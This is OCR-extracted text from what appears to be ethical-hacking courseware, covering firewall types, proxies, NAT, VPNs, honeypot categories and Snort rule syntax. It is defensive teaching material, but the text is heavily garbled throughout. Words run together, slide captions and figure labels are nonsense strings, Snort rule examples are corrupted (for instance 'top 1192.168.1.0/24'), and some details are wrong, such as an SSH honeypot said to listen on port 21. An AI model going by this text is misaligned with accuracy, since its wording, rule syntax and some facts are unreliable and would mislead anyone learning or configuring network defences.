DestinationIP address:Checks if the is goingto the correct destinationandif the
destinationaccepts thesetypesof packets. The information about the destinationIP
addressc an foundfromthe IP headerof the packet.
SourceTCP/UDP
port:Usedto checkthe source portofthe packet
DestinationTCP/UDP portregarding
port:Usedto monitor thedestination the services
to beallowedandthe services to bedenied.
TCPflag bits:Usedto checkwhetherthe packet
hasSYN, or otherbitsset for the
ACK,
connection to bemade.
Protocolin use: Usedto checkwhetherthe protocol
that the packet
is carryingshould
beallowed,
whetherthepacket
Direction:Usedto check is entering
or
leaving
the privatenetwork.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘=
Interface:
whether
Usedto check
packet unreliable
the
zone. froman
is coming

ss Network
Corporate

me it
Figure
of
12.13Example
PacketFitering
Firewall

Module2 1482
Page tical andCountermensores
Making by Comet
Copyright©
 Circuit-LevelGateway
Firewall
Creutteve

Information
gateways
pasted
work

a gateway
atthe
sesion

toa remotecomputertroughexcutevel
layer
ofthe OS!m ode!rte ansporlayera f TEP
appears tohavergnatd fromthegateway

Ceulteve
to session
monitorrequest createsessions
gateways anddetermine thot willbeallowed

at
Creat proxyfrewals
a llowor prevent steams; theydonot itr individual
packets

opentonire
Ss Corporate
Networ

Phe

{Y=
H+ tat
twat
on
halon ate
aed eon che ene ited bend
meter
Circuit-LevelGateway Firewall
firewallworksat the session layer
A circuit-levelgateway layer
of theOSImodelor transport of
TCP/IP. It forwardsdata betweennetworks andblocksincomingpackets
without verification
from the host but allowsthe traffic to pass through itself. Informationpassedto remote
computers through a circuit-level
gatewaywill appearto haveoriginated fromthegateway,as
the incomingtraffic carries the IPaddressof the proxy (circuit-level
gateway).Suchfirewalls
to create sessions anddetermineif thosesessionswill beallowed.
monitor requests

A circuit-levelgatewaygives controlledaccess to networkservices and host requests.

determinewhethera requested
Circuitproxyfirewalls
session is valid,
it checksthe TCPhandshake
allowor preventdatastreams; theydonot filterindividual
To
betweenpackets.
They
packets.
are relatively inexpensive and hide the informationabout the privatenetworkthat they
protect.
Firewat Network
Comporate

2 Physeat

“Y=
+ towednch
2
Ti
aan
seion
bya
recogni
tne
satowea tame
o enn, nite computer

12.14
of
Crcut-Level
Gateway
Firewall
Figure Example

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Firewall
Application-Level
gateways
the || pron
©Appian evel

ayer
af
Sppleaton
layer
tthe aptetion gateways
asproxy
prxies)caniterpacets
OSmodel(othe
Appetontevel
FT,gopher,
tito
coniured
other tae
web

gateway
oT)

eoportel
tronsal
eee pecsucha
an
{0 teemingandoutgoing
ttc Is vsrited to services ©Aolcatontevl rane tac an itr on

bye ther encores sppicaton commands tp pot

ret

“Y=
H+
ttc
owed
patedomarat
halon ate
ton plato eh ts arpa eh FR orconbntns

Kpplication-Level
Firewall
Application-based
proxy firewallsfocuson the application
layerratherthan just the packets.
Application-level
gateways (proxies)
can filterpacketsat theapplication
layeroftheOSImodel
layerof TCP/IP).
(orthe application Incoming and outgoingtraffic is restrictedto services
supported
bythe proxy;allotherservice requestsare denied,Theneedforan application-level
firewall arises from the tremendousamount of voice, video, and collaborativetraffic in the
data-linklayer and networklayer, whichmaybe usedfor unauthorizedaccess to internaland
externalnetworks.Application-level gateways configuredas web proxiesprohibit
FTP,gopher,
telnet,or othertraffic. They e xamine traffic andfilter application-specific
commands suchas

post
get,
HTTP: and

malicious trafficthat is missed bystatefulinspection

to allow access,and theyimprovethe overall security
of
Traditionalfirewallsare unableto filter suchtypes traffic. They
firewallsto makedecisions
of the application
find,andverify
c an inspect,
as to whether
layer.Forexample,
worms that sendmaliciouscode i n legitimate protocols cannot be detected bystateful
firewalls,as proxy firewallsfocuson packet headersin the network layer. However,deep
packet inspection firewallscan find suchattackswith the helpof informativesignaturesadded

packets,
inside

of
Some the featuresof application-level
firewallsare as follows:
application
They analyze
the informationto makedecisionsas to whetherto permit
traffic,
Being
proxy-based,
theycan permitor denytraffic according
to the authenticity
of the
user or processinvolved.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
A content-caching proxy optimizesperformance by caching frequently accessed
informationratherthansending to the servers for the same old data.
new requests

Application-layer
firewallscan functioni n one of two modes:active or passive.
=
Active application-level
firewalls:They examine all incomingrequests,including
the
actualmessagethat is exchanged, suchas SQLinjection,
againstknownvulnerabilities,
parameterandcookie andcross-sitescripting.
tampering, Therequests
that are deemed
genuine
areallowedto passthrough
Passiveapplication-level
them.
firewalls:They work similarly
to IDSi n that theyalsocheckall
incomingrequests against but they
knownvulnerabilities, do not activelyrejector deny
if a potential
thoserequests attackis discovered.
Network

Internet v Corporate
*

4 ranport
internet
2atatink iy
Post

“Y=
2X baseduch
=Oletowed
ratte
tle
omser
suchas,
stowed
combinatio
on speciesapcations aa ofarto

12.5:
of Figure Example
Applcation-Leve
Firewall

ical andCountermensores
Mackin ©by E-Comel
Copyright
 StatefulMultilayer Firewall
Inspection
|
aspects
Fiteriog,Circut-Levelofthe
Statefulmuttayerinspection
firewalls
combinethe otherthreetypes
Firewalls)
andAppiation-Leve!
Gateways,
offrewalls(Packet

packets the a
|G Theyfer packets for internet layerof TCF/IP,
atthenetwork layerofthe OS!m ode! to determine
whethersesion andtheyevaluate
are legitimate, thecontentsof packetstheapoiationlayer

Phe

“Y=
T cl ardatetoe
HK halon ate donsienna ec opto en

StatefulMultilayer Inspection Firewall

Statefulmultilayer firewallscombinethe aspects
inspection of the three above-mentioned
typesoffirewalls(packet
filtering,
circuit-level andapplication-level
gateways, firewalls).
They
filter packets
at the networklayer of the TCP/IP
of the OSImodel(orthe internet layer model)
todetermine whethers essionpackets are legitimate,andtheyevaluatethe contents of the
packets at the application
layer.
Usingstatefulpacket filtering,
you can overcome the limitationof packet
firewalls,
whichcan
onlyfilterthe IP address,port,protocol,and so on. Thismultilayer
firewallcan perform
deep
packet inspection,
Featuresof the StatefulMultilayer
Inspection
Firewall:
‘=
Thistypeoffirewallcan rememberthe packets through
thatpassed it earlier
andmake
aboutfuture packets
decisions accordingly.
Thesefirewallscombinethe bestfeaturesof both packet
filtering
andapplication-based
filtering.
CiscoPIXfirewallsare stateful.
Thesefirewallstrackandlogslotsor translations.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 poy

\Y ter layer
2
+

bed the
tric
tatowed tame
tee on wean laren

Multilayer
inspection
guce12.16:ampleof Statefl Fewall

Module2 1498
Page tical andCountermensores
Making by Comet
Copyright©
 Application
Proxy
1@Anapplication
levelproxyworks
asserver
and
aprony fiters connections fr specific

Iefiters connections bazedon the

application services
protocols
appropriate
and to that

anwillallow
Forexample,FTPproxywill nly
services andprotocals beblocked
FTPtrafic to pass through,
and other
all
Application
Proxy
application-level
‘An proxy
works as a proxy server andfiltersconnectionsfor specific
o n the services andprotocols
filtersconnections based
FTPproxywill onlyallowFTPtraffic to passthrough
a s a proxy.Forexample,
whenacting an
services. It

whileal other services and protocols will

beblocked.Its a typeof server that actsas an interface between theuser workstationandthe
Internet.It correlateswith the gateway server and separates the enterprisenetworkfromthe
Internet. It receives a request from a user to provide the Internet service andresponds to the
original requestonly.A proxy service is an application or programthat helps forward user
requests (forexample, FTP or Telnet) to the actualservices. A proxy is alsoknown as an
application-level gateway,as it renews the connections and act as a gateway to the services.
Proxiesrun on a firewallhostthat is either a dual-homedhostor some other bastionhostfor
security purposes.Someproxies,namely caching proxies,improvenetworkefficiency. They
keepcopies of the requested dataof the hoststhat theyproxy. Suchproxies can provide the
datadirectly whenmultiple hostsrequest the same data.Caching proxieshelpi n reducingthe
loado n networkconnections, whereasproxy servers provide both security andcaching
A proxyservice is availableto the user i n the internalnetworkandthe service i n the outside
network (Internet),and it is transparent. Insteadof direct communication, it talkswith the
proxyand it handlesall the communication betweenusers and Internet services. Transparency
is the main advantageofproxyservices. Totheuser, a proxyserver presents an illusion
that itis
dealing directly
with the realserver, whereasto a realserver, the proxy server givesthe illusion
that itis dealing
directly
withtheuser.
‘Advantages
=
Proxy
services are usefulfor logging theycan understandapplication
because protocols
andeffectively
allowlogging,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
services reducethe loadon networklinksas they
Proxy of caching
are capable copiesof
frequently
requested dataandallow it to be directly
loadedfromthe system
insteadof
thenetwork
=

=
Proxy
systems
Proxy
perform
systemsautomatically
user-level
authentication,
as
they
are
involved
connectio in the

protectweak or faultyIP implementationsas theysit

betweentheclientandtheInternetandgeneraten ew IPpackets
fortheclient.
Disadvantages
=
Proxy
services lagbehindnon-proxyservices until suitableproxysoftwareis available.
+
Eachservice in a proxy may use differentservers.
Proxy services i n the client,
mayrequirechanges applications,
andprocedures.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NetworkAddressTranslation(NAT)
Networkaddresstranslationseparate P adresses
nto two sts andenables theLANto wie these
a ddresses
forintenalandexternaltrafficseparately

Ie
also
with fitering.
work
simultaneouslythethe
a route sia wopach NATl o modifies packets outer sends

to
Teastheality theadres ofthepacket
change andmake't appearthave arived frm avalid adress

firewall teringtechnique

which
Incanacta wherei t allwsonlythose whichornate onthe Inside
c onnections
andwil block
network theconnections erignateon theoutsidenetwork

NetworkAddressTranslation (NAT)
Networkaddresstranslation(NAT) IPaddresses
separates into two setsandenablesthe LANto
use theseaddresses forinternalandexternaltraffic.The NAT helps hidean internalnetwork
layoutand force connections to go through a chokepoint.It alsoworkswith a router, and
similarly
to packet filtering,
it will also
Whenthe internalmachineforwardsthe packet modify
the packets that the router sends
to the externalmachine,
simultaneously.
the NATmodifiesthe
source
of
addressthe packet
externalmachinesendsthe packet as valid
address.
When
to makeit appear if itis coming
to the internalmachine,
from a the
the NATmodifiesthe destination
The NAT can alsochange
addressto turn the visibleaddressinto the correct internaladdress.
the source anddestinationportnumbers.It limitsthe numberof public IPaddresses that an
organizationcan use. It can act as a firewall filtering
technique
whereby it allowsonlythose
connectionsthatoriginate i n the internalnetworkandblocksthe connectionsthat originate in
theexternalnetwork.
use differentschemes
NAT systems for translationbetweeninternalandexternaladdresses:
‘=
Assignone external hostaddress
foreachinternaladdress
andalways apply the same
translation.Thisslowsdownconnections anddoesnot provide
any savings i n address
space.
Dynamicallyallocatean external hostaddresswithout modifying the port numbers
whenthe internalhostinitiates a connection. Thisrestricts the numberof internalhosts
that can simultaneously access the Internet to the numberof available external
addresses.
to externally
Create a fixed mappingfrominternaladdresses visibleaddresses
but use a
portmappingso that multiple
internalmachines
use the same externaladdress,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
Dynamically
allocatean externalhostaddress
andportpair eachtime an internalhost
initiates a connection. Thismakesthe most efficientpossible
use of the externalhost
addresses.
Advantages
Network addresstranslationhelpsto enforcethe firewall’s
control over outbound
connections.
=

incoming
It restricts
traffic
allows
packets
initiatedfromthe inside,part
current
and
interactio
only that are of a

=
Ithelps hidethe internalnetwork'sconfiguration
and thuslowersthe successrate of
attackson thenetworkor system.
Disadvantages
‘=
hasto guesshow long
TheNAT system it shouldkeep
a particular
translation,
whichis
not always
possible.
TheNATinterfereswith encryption
andauthenticationsystems
to ensure the security
of
the data.
allocation
Dynamic ofportsmayinterfere filtering
with packet

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Virtual PrivateNetwork

eis
secure
usedforthe
and encryption
‘encapsulation untrusted
network,
transmission
of sensitiveinformation
over an using

Ieestablches
a use connectionthrough
vitual point-to-point the ofdedicated
connections

thecomputing
Cony device
u nningtheVPNsoftwar

Virtual PrivateNetwork
A virtual privatenetwork(VPN) is a networkthat provides
secure access to the private network
through the Internet.VPNsare usedfor connecting widearea networks(WAN). They allow
computers on one networkto connect to computers on anothernetwork.They a re usedfor the
secure transmissionof sensitive informationover an untrusted networkvia encapsulation and
encryption. Theyemploy encryption and integrityprotection,enabling you to use 2 public
networkas a privatenetwork.A VPN performs and decryption
encryption outsidethe packet
filteringperimeter to allowthe inspection of packetscomingfromother sites. It establishes a

connection
virtual point-to-point
encapsulates packets
through the use of dedicatedconnections. A VPN also
sent over the Internet.It combinesthe advantages
networks.VPNshaveno relationto firewalltechnology,
private
of both public
butfirewallsare convenient for
and

VPNfeatures
adding a s they
helpin providing secure remote services. Thecomputing device
running only
access
the VPNsoftwarecan
adopt following
All VPNsthat run over principles:
the Internet
theVPN.
the
=

the
traffic
Encrypts
Checks
=

=
integrityfor
Encapsulates
protection
new packets,
whichare sent across the Internetto some destinationthat
reverses the encapsulation

Checks
the integrity
Decrypts
thetrafficeventually

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Advantages
=
APN hidesall the trafficthat flowsover it, ensuresencryption,
and protects
datafrom,
snooping.
=
remote accessfor protocols
It provides whileavoiding attackers
fromthe Internet at
large.
Disadvantages
‘=
As the VPN runs on a public the user will bevulnerable
network, to an attackon the
destinationnetwork.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FirewallLimitations

‘Afrenal
cannot doanything
eign
thenetwork or faulty
configuration

felis tunneled
unbleo understand wai

Firewall Limitations
Althoughfirewalls
a re essential
to yoursecurity strategy, theyhavethe following limitations:
=
Firewallscan restrict users fromaccessing valuableservices suchas FTP, Telnet, NS,
etc,,andthey sometimesrestrict Internet access as well
Thefirewallcannot preventinternalattacks(backdoor) e.g.,a disgruntled
i n a network,
employee whocooperates with theexternalattacker.
Thefirewallfocusesi ts security at a singlepoint,whichmakesother systems withinthe
networkproneto security
attacks.
A bottleneckcouldoccur if allthe connections passthrough
the firewall
Thefirewallcannot protectthenetworkfromsocialengineeringanddata-driven
attacks
whereby the attackersendsmaliciouslinksandemailsto employeesinsidethe network.
If externaldevicessuchas laptops, mobile phones, portable
hard drives, etc, are
already infectedandconnected to the network,then a firewallcannot protectthe
networkfromthesedevices,
Thefirewall is unableto adequately protectthe networkfrom all typesof zero-day
viruses that tryto bypassit.

A
A
firewallcannot do anything

not
ifthe networkdesign andconfiguration
firewall is an alternativeto antivirus or antimalwaretools.
is faulty.

A
A
firewalldoesnot blockattacksfroma higher
firewalldoesnot preventattacksoriginating
leveloftheprotocol
stack.
fromcommon portsandapplications

A
A
firewalldoesnot preventattacksfromdial-inconnections.
firewallis unableto understandtunneledtraffic.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Honeypot
‘A
honeypot
an information
site resource that set uptoattrac and
expresy ap people
whoate

'A ort
access
or
monitor early
honeypot
cn lo
warnings
attempts an These
atacer'skeytroke. could be

Honeypot
honeypot
‘A systemon the Internet intendedto attract and trapthosewho
is @ computer
attemptunauthorized of the hostsystemto penetratea n organization's
or illicitutilization
network.It is a fakeproxyrun to frameattackersbylogging trafficthroughit andthen sending
complaints to thevictims’ISPs.It hasno authorized
activityor productionvalue, and any traffic
to it is likelya probe, attack,or compromise.Wheneverthere is any interaction with a
honeypot, it is most likely to be malicious.Honeypotsare unique; they do not solvea specific
problem. Instead, theyare a highlyflexibletools with manydifferent securityapplications.
Honeypots helpin preventing attacks,detectingattacks, and informationgathering and
research, A honeypot can logportaccessattempts or monitor an attacker'skeystrokes; these
couldbeearly
a
warningsof more concertedattack.It requires a considerable
to maintain a honeypot.
amount of effort

12.17:
Figure of Honeypot
Example

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Honeypots
Types
of
honoypots
bazed
on
‘Classification
their
design criteria

of Honeypots
‘Types
Honeypots into the following
are classified typesbasedon their designcriteria:
+
Low-interaction Honeypots
Low-interaction honeypots emulateonlya limitednumber of services and applications
of a targetsystem or network.If the attackerdoessomething that the emulationdoes
not expect,the honeypot will simply
generatea n error. They
capture limitedamounts of
information, Le,, mainlytransactionaldata,and some limited interactions. These
honeypots
cannot be compromised completely.
They a re set to collect higher-level
informationaboutattackvectors suchas network probes and worm activities. Some
examples KFSensor,
are Specter, andHoneytrap.
KFSensor is a low-interaction honeypot usedto attract and identify penetrations. It
implements vulnerablesystem services and Trojans to attract hackers.Thishoneypot
be usedto monitor all TCP,
‘can UDP,and ICMPportsand services. KFSensoridentifies
andraisesalertsabout portscanning andDoSattacks.
A honeytrap is a low-interaction honeypot usedto observeattacksagainst TCPandUDP
services. It runs as a daemonandstarts server processes dynamically on requested
ports.Attackersare trickedinto sending responsesto the honeytrap server process.The
data that is received bythe honeypot is concatenated into a stringand storedi n a
databasefile.Thisstringis calledtheattackstring.Honeytraps parseattackstringsfor a
‘command requesting the server to downloada file fromanotherhosti n the network.If
such a commandis detected,the server tries to access the corresponding file
automatically. It supports onlyFTP and TFTP protocols. It also identifiesand logs
HTTP_URIs.

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Medium-
interactionHoneypots
Medium-interaction honeypots simulatea realOSas well as applicationsandservices of
a targetnetwork,They providegreatermisconception of an OS than low-interaction
honeypots. Therefore, it is possibleto logand analyze more complex attacks.These
honeypots capture more usefuldata than low-interactionhoneypots. They can only
respond to preconfigured commands; the riskof intrusion increases. The
therefore,
main disadvantage of medium-interaction honeypotsis that the attackercan quickly
discoverthatthe system behavioris abnormal.Someexamples of medium-interaction
honeypots includeHoneyPy, Kojoney2, andCowrie.
Kojoney2 is a medium-interaction honeypotthat emulatesa realSSHenvironment. This,
honeypot listenson port 21 for incomingSSHconnections. If a connection requestis
initiated,
Kojoney2 will verify
users againstan internallist of fake users. Usually,
the
connections are accepted bygranting a ccessto the SSHshell.It simulates manyshell
commands to trickattackers.Using Kojoney2,attackerscan downloadfiles usingwget
andcurlcommands.
High-Interaction
Honeypots
Unliketheir low- andmedium-interaction high-interaction
counterparts, honeypots do
not emulateanything; theyrun actualvulnerableservices or softwareon production
systemswith real OSand applications. Thesehoneypots simulateall services and
applications of a targetnetwork.They c an becompletelycompromisedbyattackers to
gain full access to the system i n a controlledarea. They
capturecomplete information
aboutan attackvector suchas attacktechniques,tools,andintent. Thehoneypotized
systemIs more prone to infection,as attack attemptscan be carriedout on real
production systems.
honeynet
‘A is a primeexample of a high-interaction
honeypot. It is neithera product
nor a softwaresolutionthat a user installs,Instead, it is an architecture—an entire
network of computers designedto attack.The idea is to havean architecture that
creates a highly controllednetworkwith real computers running real applications,in
andlogged.
whichall activities are monitored
guys―
“Bad find,attack,andbreakinto thesesystems through theirown initiative. When
theydo, theydo not realizethat theyare i n a honeynet. Withoutthe knowledge of the
attackers, all theiractivities andactions,fromencrypted SSHsessionsto emailand file
uploads, are captured byinserting kernelmodulesinto their systems.
the
‘At same time,the honeynet controlsthe attacker'sactivity.
Honeynets do this by
usinga honeywall gateway, whichallowsinboundtrafficto the victim'ssystems but
controlsthe outboundtraffic usingintrusion prevention technologies.
Thisgivesthe
attackerthe flexibility
to interact with the victim's systemsbut prevents
the attacker
fromharming othernon-honeynet computers.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
PureHoneypots
Purehoneypots emulatethe real production They
networkof a targetorganization.
cause attackersto devote their time and resources toward attacking
the critical
productionsystemof the company,Attackersuncover anddiscoverthe vulnerabilities
andtriggeralertsthat help
network administrators early
to provide warningsof attacks
andhencereducethe riskof an intrusion.
Honeypotsare classified into the followingtypesbasedon their deployment strategy:
Production Honeypots
Productionhoneypots are deployed insidethe production network of the organization
‘along
with other production servers. Although suchhoneypots improvetheoverallstate
of securityof the organization, theyeffectively captureonlya limited amount of
informationrelatedto the adversaries. Suchhoneypots fall underthe low-interaction
honeypot categoryand are extensively employed by largeorganizations and
corporations. As production honeypots are deployed internally,theyalsohelpto find
internalflawsandattackerswithin an organization,
‘out
=
Research Honeypots
Research honeypots are high-interaction honeypots primarily deployed by research
institutes,governments, or militaryorganizations to gain detailedknowledge aboutthe
actions of intruders. Byusingsuchhoneypots, security analysts can obtainin-depth
informationabouthow an attackis performed, vulnerabilitiesare exploited, andattack
techniques andmethodsare usedbytheattackers. Thisanalysis, i n turn, can helpan
organization to improveattack prevention, detection, and security mechanisms and
develop a more secure network infrastructure.
Themain drawback of researchhoneypots is that theydo not contributeto thedirect
securityof the company. If a company is lookingto improve its production
infrastructure, it should optforproduction honeypot.
Honeypotsare classified into the followingtypes based on their deception technology:
=
MalwareHoneypots
Malwarehoneypots are usedto trapmalwarecampaigns or malwareattempts over the
networkinfrastructure. Thesehoneypots are simulatedwith knownvulnerabilitiessuch
as outdatedAPIs, vulnerableSMBvi protocols, etc.,and theyalsoemulatedifferent
Trojans, viruses, and backdoors that encourageadversaries to perform
exploitation
activities. Thesehoneypots lurethe attackeror malwareinto performingattacks, from
whichthe attackpattern,malwaresignatures, and malwarethreatactors can be
identifiedeffectively.
DatabaseHoneypots
Database honeypotsemploy fake databases
that are vulnerable database-
to perform
relatedattackssuchas SQLinjection
anddatabaseenumeration. Thesefakedatabases
trickthe attackersbymaking
themthink that thesedatabases
contain crucialsensitive

ical andCountermensores
Mackin ©by E-Comel
Copyright
information suchas credit carddetailsof all the customers and employee databases.
However,all the informationpresenti n the databaseare fake and simulated.Such
databases lure the attackerto perform attacks, with their vulnerabilities;
fromthe
attacks,
the attackpatternandthethreatactor’s TTP’s
towardsdatabaseattackscan be
effectively.
identified
‘Spam
Honeypots
‘Spam
honeypots specifically
targetspammerswhoabusevulnerableresources suchas
andopen proxies.Basically,
mail relays
‘open spamhoneypots consist of mail servers
that deliberately emailsfromanyrandomsource fromthe Internet.They
accept provide
crucial informationaboutspammersandtheir activities.

Email
Honeypots
Emailhoneypots are alsocalledemailtraps.They a re nothingbut fakeemailaddresses
that are specifically
usedto attract fakeand maliciousemailsfromadversaries. These
fakeemailIDswill be distributed across the open Internetanddarkweb to lurethreat
actors into performing various maliciousactivities to exploit the organization.
By
constantly monitoringthe incomingemails, the adversary’s
deception techniques
can be
identifiedbythe administrators andinternalemployees can bewarnedto avoidfalling
into such
Spider
email
traps.
Honeypots
Spiderhoneypots are alsocalledspider traps.Thesehoneypotsare specifically
designed
to trap web crawlers and spiders.Manythreatactors perform web crawling and
spideringto extract importantinformation from web applications. Suchcrucial
informationincludes URLs,contact details, directory
details,
etc. Spiderhoneypots are
employed to trapsuchadversaries. A fakewebsitewill beemulatedandpresented as a
legitimate
one. Threatactors attempting web crawling
to perform on suchtrapswill be
identifiedandblacklisted
Honeynets
are
Honeynetsnetworksof honeypots.
of the adversaries.Honeynets
capabilities
environmentalong
are in
They very effectivedetermining
are mostlydeployed
entire
in an isolatedvirtual the
with a combinationof vulnerable servers. The various TTPs
employed bydifferentattackersto enumerate and exploitnetworkswill be recorded,
andthis informationcan be very effectivei n determining
the complete capabilities
of
theadversary.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

@ | wore teaon

IDS,IPS,Firewall,and Honeypot
Solutions
The previoussection discussed role,andplacement
the function, of IDS,IPS,firewalls,
and
honeypots for securing networks.A numberof easy-to-use
and feature-enrichedsolutions
(hardware,software,or both) are available
forthe implementation of IDS,IPS,firewalls,and
honeypots. some commercially
Thissection discusses availablesolutionsthat simplify
the usage
ofIDS,IPS, andhoneypots.
firewalls,

Module2 1508
Page tical MakingandCountermensores
by
Copyright©
Comet
 IntrusionDetectionTools: Snort

OEE Eee
Snort Rules
CEH
Snortrules
helpi n iferentitng between and
Snortrules
must becontained ona theSnortruleparser
come with wo lageal
Snortrules parts:

e p any any (3/559.168°3 8/24

Ga
iteonvanes% 96.6186 aBi*) vmounedaccean’
mag’

Module2 1502
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 SnortRules:RuleActions and IP Protocols

Rule
action tobe
(©Theruleacton
alerts a
performedthereto
Snortwhen'tfinds
(@Thereae threeavalableaction
a
beapplied

i n Sort packet that matchestherle teria

Actions
dlr
the metho athena ic

‘There
ae thre avaibleP protocols
that Snotsupports
oFsuspicious behavior

eo 13?

© wv

© ww

SnortRules:TheDirection Operator
and IP Addresses

Direction Operator
‘The
“©
Thisoperator
indicates
thedrection
ofinterestforthetaf raf an flowinether snl directionor
“©
ofa
GxampleSnort wing the bidirectional
operator

IP Addresses
TELIELEELiiifitniiti
18ley
|G Use te and
shatto
adress he port the le apes
a ny"tone the Pads
the keyword

of wthaCDR
18Useume addressesqualified netmask
|G ample a Ades Negationle:

Module2 1502
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 SnortRules:PortNumbers

|@ Baample
canbe
|@ Portr umbers
sted
ferent
ways,
with
range
operator"
(©Portrangesareindcates
ofa Port Negation
the
including
"an" pots, atc portdefintions,
por ranges,an bynegation

‘ation

Leeuoranyam>—amatesayasuame
conn
tom
ape
okpos
agg
am
MEUORtMe denon
LogTe>anyany->
TCP
__192.168:14/245000
any
going
to
pots
than
Log wate om port at or equal
0 500

terTrany eth» aaasexaratam

tom
SEE ewespers
pet ern eta an

|
IntrusionDetectionTools:SuricataandAlienVault®
OssIMâ„¢ (EH

intrusion
detection
intusion
Prevention
(5),
neteck
seenty
montorag
ofreatime

(NSM) (0),
nd

Intrusion DetectionTools
Intrusion detection tools detectanomalies.Thesetools,when running on a dedicated
workstation, read all network packets,reconstruct user sessions, and scan for possible
Intrusions bylooking
forattacksignaturesandnetworktrafficstatisticalanomalies.Moreover,
thesetoolsoffer real-time,
zero-dayprotectionfromnetworkattacksandmalicioustraffic,and
theypreventmalware, spyware,portscans,viruses, DoS,
andDDoS fromcompromising hosts,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Snort
Source:https://www.snort.org
Snortis an open-source networkintrusion detectionsystem capableof performing real:
time
traffic
analysis andpacket
andcontent searching/matching,
suchas bufferoverflows,
logging It can perform
on IP networks. protocol analysis
anditis usedto detecta varietyof attacksandprobes,
stealthport scans, CGI attacks, SMB probes, and OS
fingerprinting
attempts.It uses a flexibleruleslanguageto describetrafficthat it should
or that
collect pass,aswell asa detection

of
Uses Snort:
engine usesa modular plug-in
architectur
Straight
packet sniffersuchas tcpdump
Packetlogger(useful for networktrafficdebugging,
etc.)
©. Networkintrusion prevention system

Figure
af
12.18:Screenshot Snort

ical andCountermensores
Mackin ©by E-Comel
Copyright
SnortRules
Snort
Figure 12:19: output

Snort'sruleengineallowscustom rulesto meet the needs

of thenetwork.
Snortrules
helpi n differentiating
betweennormalInternet activities andmaliciousactivities, Snort
usesthe popular libpcaplibrary
(forUNIX/Linux)
or Winpcap (forWindows), the same
librarythat tepdump uses to performits packet sniffing.
Attaching Snort i n the
promiscuous modeto the networkmediadecodesall the packets passingthrough the
network.It generatesalertsaccording
to the content of individual packets and rules
definedin the configuration
file.
Snortallowsusers to write theirown rules.However,
eachof theseSnortrulesmust
describethe following:
© of the company that might
Anyviolationof the securitypolicy be a threat to the
security ofthecompany’s
networkandothervaluable information
All well-knownandfrequent attemptsto exploit
thevulnerabilitiesin the company's
network
The conditionsi n whicha user thinksthat a networkpacket(s) (i, if the
is unusual

identityof the packetis not authentic)

Snort rules,
written for both protocol
analysis
and content searching
and matching,
shouldberobustandflexible.Therulesshouldbe“robust―:
thesystem
shouldmaintain
a hardcheckon the activities taking
of any potential
sufficiently
place
o n the network
and
intrusion attempt.Therulesshouldbe“flexible―:
compatible to act immediately
notifythe administrator
the systemmust be
and take necessary remedial measures
to thenature ofthe intrusion.
according

ical andCountermensores
Mackin ©by E-Comel
Copyright
Both flexibility
and robustness
can be achievedusing an easy-to-understand and
lightweight
rule-description
languagethat aids i n writing simple
Snortrules.Consider
the
©
following
primary
two
while
principles
writing
beyond
Snort
No written rule must extend a single
rules:
line;thus,rulesshouldbe short,

Each
to logical
precise,andeasy understand.
ruleshouldbedividedinto two sections:
* Theruleheader
* Theruleoptions
Theruleheadercontains the rule'saction,the protocol,the source anddestinationIP
addresses,the source anddestinationportinformation,andthe Classless Inter-Domain
Routing(CIDR) block.Theruleoptionsection includesalert messages i n addition to
informationaboutthe inspected partof the packet to determinewhetherto take any
ruleaction.

19001 8 6 abi") magi “nountd

access")

12.20:
Figure ofSnortr ules
Example
SnortRules: RuleActionsandIP Protocols
Therule headerstores a complete set of rulesto identify a packet anddeterminesthe
action to be performed or rule to be applied. It contains informationthat definesthe
who,where, and what of a packet, as well as what to do if a packet with all the
attributesindicatedin the ruleshouldshowup.Thefirstitem in a rule is the rule action,
whichtells Snort “what when it finds a packet
to do― that matchesthe rule criteria
Thereare fiveavailable defaultactions in Snort:alert,log,pass,activate,anddynamic.
Furthermore, if Snortis runningi n the inline mode, you haveadditionaloptions, which
includedropandreject.
The IP sendsdata from one systemto another via the Internet. It supports unique
addressing for every computer on a network.Organize data on the IP network into
packets. Eachpacket contains message data, source,destination, andmore.
Snortsupports threeavailableIPprotocols to tacklesuspicious behavior:
© TCP: TheTransmissionControl Protocol(TCP) is a partofthe IP. Itis used
to connect
two differenthostsandexchange databetweenthern.
Protocol(UDP)
UDP:TheUserDatagram is usedfor broadcasting
messages
over a
network.
ICMP:TheInternetControlMessage Protocol(ICMP)
for example,
ICMPi na networkto senderror messages, of
is a part the IP.TheOSuses

ical andCountermensores
Mackin ©by E-Comel
Copyright
SnortRules: andIP Addresses
DirectionOperator
DirectionOperator
Thisoperatorindicatesthe directionof interest for the traffic;
trafficcan floweither
ina directionor bidirectionally.
single
Example
a
of Snortrule usingthe BidirectionalOperator:
log 1192.168.1.0/24any <> 192.168.1.0/24 23
IPAddresses
‘Identify
theIPaddressand portthatthe ruleapplies
to
* Usekeyword"any'to definetheIP address
*
numeric
Use
addresses
qualified
with
IP a netmask
CIDR
‘+

Example
Address
alert
Negation
of IP Rule:
top 1192.168.1.0/24 any -> 192.168.1.0/24 112
(content: "|00 01 86 a5|"; msg: “externalmountd access"
SnortRules: Port Numbers
;)
Portnumbers ways,including
can be listedi n different theuse of"any" ports,static port
definitions, port ranges, and by negation. Port ranges are indicatedby the range

an the
operator Thedirection
"."
operator indicates orientation or direction
"-$>$" ofthe

of to applies. and onleft

traffic whichthe rule Consider IPaddress portnumber the side
the directionoperator as thetrafficcomingfromthe source hostandthe address and
portinformationon the rightsideof the operator as thedestinationhost.Thereis alsoa
bidirectional operator, indicated by“$<>$".
ThistellsSnortto consider theaddress/port
pairs i n either the source or the destination orientation,and it is handyfor
